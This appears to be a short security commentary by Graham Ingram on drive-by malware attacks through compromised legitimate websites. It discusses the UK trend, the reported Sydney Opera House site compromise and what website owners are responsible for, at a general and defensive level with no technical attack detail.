While drive-by malware attacks are not a recent phenomenon, they do appear to be on the increase, particularly in the UK. It may be just a matter of time before we see similar trends in Australia.

Drive-by malware or drive-by downloads are attacks which involve the compromise of legitimate web sites by attackers in order to compromise the computers of users who, through their normal browsing behaviour, visit those sites. These sites typically host various forms ID theft malware - that are designed to capture usernames and passwords, key strokes, form data or other user input/output and protected storage data, such as passwords and digital certificate files (private keys) stored on these computers for the purposes of identity theft and financial fraud.

UK information security sources report that drive-by malware is now a major attack vector in the UK, particularly for banking trojans, and that they are seeing fewer spam emails containing links to sites hosting malware or acting as redirectors to malware hosting sites.

Until recently, attackers relied on spam emails as the major attack vector to direct victims to their web sites which hosted the malware to infect their computers. Typically, attackers would either compromise a legitimate site and spam the links to the site or they would spam the links to a fraudulent web site containing the malware most likely hosted on a fraudulent domain (or sometimes just use an IP address).

Google has published a detailed paper describing the increasing prevalence of legitimate sites hosting malware unwittingly following compromise by attackers.

Without the existence of a widely distributed spam email pointing to the compromised hosts, it is now far more difficult to detect the existence of these compromised web sites which are serving malware to visitors of these sites.

In addition, these sites create a much greater challenge for user education. While a simple mitigation against spam is to tell users "don't click on links in untrusted emails" this does not apply to this type of attack. Instead, other aspects of user education become more important (such as running in least privileged user mode, patching software and keeping anti-virus up todate, etc).

These types of attacks remind us that my security is only as good as the security of the networks I connect to - or, "the risks assumed by one are shared (potentially) by all". Consequently legitimate web site owners must be mindful that their security is not just about protecting their own reputation and protecting their sensitive data which may be served via their web site - but also need to be mindful that the web site itself could be used as an attack vector to compromises any computer that visits their site.

It is this latter point that some organisations seem to forget - or perhaps in some case just don't understand.

If the media reporting is accurate, this appears to be the case for the relatively recent Australian sydneyoperahouse.com web site which was compromised in order to serve trojan malware to vulnerable computers which connected to the web site.

A spokesperson for the Sydney Opera House said that it "did not result in the disclosure of customer data" which missed the point of the attack. The attack was not meant to steal customer data held by sydneyoperahouse.com rather it was meant to deploy malware to steal personal information and credentials from those individuals who visited the site.

The comment also reflected a lack of concern for the potential compromise of the computers belonging to the 300,000 or so users that visit the web site on a monthly basis. (As concerning was that they had no ability to detect when the site compromised occurred).

Even if the compromise is detected, trying to get the owner of a legitimate web site to understand they have been compromised and then to get them to act is not trivial particularly if they do not have security expertise and will incur a loss from any potential outage which may be required to clean the site.

Graham Ingram